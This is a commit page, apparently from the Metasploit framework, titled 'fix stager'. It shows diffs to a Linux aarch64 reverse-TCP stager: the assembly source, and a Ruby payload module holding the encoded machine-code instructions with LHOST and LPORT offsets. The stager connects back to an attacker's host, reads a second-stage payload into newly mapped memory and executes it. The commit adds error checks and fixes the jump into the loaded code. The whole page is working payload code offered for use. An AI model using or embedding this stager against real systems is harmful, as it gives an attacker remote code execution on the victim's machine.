Skip to content

Commit 6dbe001

Browse files
timwrtimwr
committed
fix stager
1 parent 202c936 commit 6dbe001

File tree

2 files changed

+26
-17
lines changed

2 files changed

+26
-17
lines changed

external/source/shellcode/linux/aarch64/stager_sock_reverse.s

Lines changed: 11 additions & 7 deletions
Original file line numberDiff line numberDiff line change
@@ -37,9 +37,10 @@ start:
3737
mov x2, #4
3838
mov x8, SYS_READ
3939
svc 0
40-
cbz w0, failed
40+
cmn x0, #0x1
41+
beq failed
4142

42-
ldr x2, [sp,#0]
43+
ldr w2, [sp,#0]
4344

4445
/* Page-align, assume <4GB */
4546
lsr x2, x2, #12
@@ -53,12 +54,13 @@ start:
5354
mov x3, #34
5455
mov x4, xzr
5556
mov x5, xzr
56-
/* call mmap() */
57-
movi x8, SYS_MMAP
57+
mov x8, SYS_MMAP
5858
svc 0
59+
cmn x0, #0x1
60+
beq failed
5961

6062
/* Grab the saved size, save the address */
61-
ldr x4, [sp]
63+
ldr w4, [sp]
6264

6365
/* Save the memory address */
6466
str x0, [sp]
@@ -73,13 +75,15 @@ read_loop:
7375
mov x2, x4
7476
mov x8, SYS_READ
7577
svc 0
78+
cmn x0, #0x1
79+
beq failed
7680
add x3, x3, x0
7781
subs x4, x4, x0
7882
bne read_loop
7983

8084
/* Go to shellcode */
81-
ldr x30, [sp]
82-
ret
85+
ldr x0, [sp]
86+
blr x0
8387

8488
failed:
8589
mov x0, 0

modules/payloads/stagers/linux/aarch64/reverse_tcp.rb

Lines changed: 15 additions & 10 deletions
Original file line numberDiff line numberDiff line change
@@ -33,8 +33,8 @@ def initialize(info = {})
3333
{
3434
'Offsets' =>
3535
{
36-
'LPORT' => [ 186, 'n' ],
37-
'LHOST' => [ 188, 'ADDR' ],
36+
'LPORT' => [ 206, 'n' ],
37+
'LHOST' => [ 208, 'ADDR' ],
3838
},
3939
'Payload' =>
4040
[
@@ -45,19 +45,20 @@ def initialize(info = {})
4545
0xd28018c8, # mov x8, #0xc6 // #198
4646
0xd4000001, # svc #0x0
4747
0xaa0003ec, # mov x12, x0
48-
0x10000501, # adr x1, b8 <sockaddr>
48+
0x100005a1, # adr x1, cc <sockaddr>
4949
0xd2800202, # mov x2, #0x10 // #16
5050
0xd2801968, # mov x8, #0xcb // #203
5151
0xd4000001, # svc #0x0
52-
0x35000420, # cbnz w0, ac <failed>
52+
0x350004c0, # cbnz w0, c0 <failed>
5353
0xaa0c03e0, # mov x0, x12
5454
0xd10043ff, # sub sp, sp, #0x10
5555
0x910003e1, # mov x1, sp
5656
0xd2800082, # mov x2, #0x4 // #4
5757
0xd28007e8, # mov x8, #0x3f // #63
5858
0xd4000001, # svc #0x0
59-
0x34000340, # cbz w0, ac <failed>
60-
0xf94003e2, # ldr x2, [sp]
59+
0xb100041f, # cmn x0, #0x1
60+
0x540003c0, # b.eq c0 <failed>
61+
0xb94003e2, # ldr w2, [sp]
6162
0xd34cfc42, # lsr x2, x2, #12
6263
0x91000442, # add x2, x2, #0x1
6364
0xd374cc42, # lsl x2, x2, #12
@@ -69,19 +70,23 @@ def initialize(info = {})
6970
0xaa1f03e5, # mov x5, xzr
7071
0xd2801bc8, # mov x8, #0xde // #222
7172
0xd4000001, # svc #0x0
72-
0xf94003e4, # ldr x4, [sp]
73+
0xb100041f, # cmn x0, #0x1
74+
0x54000200, # b.eq c0 <failed>
75+
0xb94003e4, # ldr w4, [sp]
7376
0xf90003e0, # str x0, [sp]
7477
0xaa0003e3, # mov x3, x0
7578
0xaa0c03e0, # mov x0, x12
7679
0xaa0303e1, # mov x1, x3
7780
0xaa0403e2, # mov x2, x4
7881
0xd28007e8, # mov x8, #0x3f // #63
7982
0xd4000001, # svc #0x0
83+
0xb100041f, # cmn x0, #0x1
84+
0x540000c0, # b.eq c0 <failed>
8085
0x8b000063, # add x3, x3, x0
8186
0xeb000084, # subs x4, x4, x0
82-
0x54ffff21, # b.ne 84 <read_loop>
83-
0xf94003fe, # ldr x30, [sp]
84-
0xd65f03c0, # ret
87+
0x54fffee1, # b.ne 90 <read_loop>
88+
0xf94003e0, # ldr x0, [sp]
89+
0xd63f0000, # blr x0
8590
0xd2800000, # mov x0, #0x0 // #0
8691
0xd2800ba8, # mov x8, #0x5d // #93
8792
0xd4000001, # svc #0x0

0 commit comments

Comments
 (0)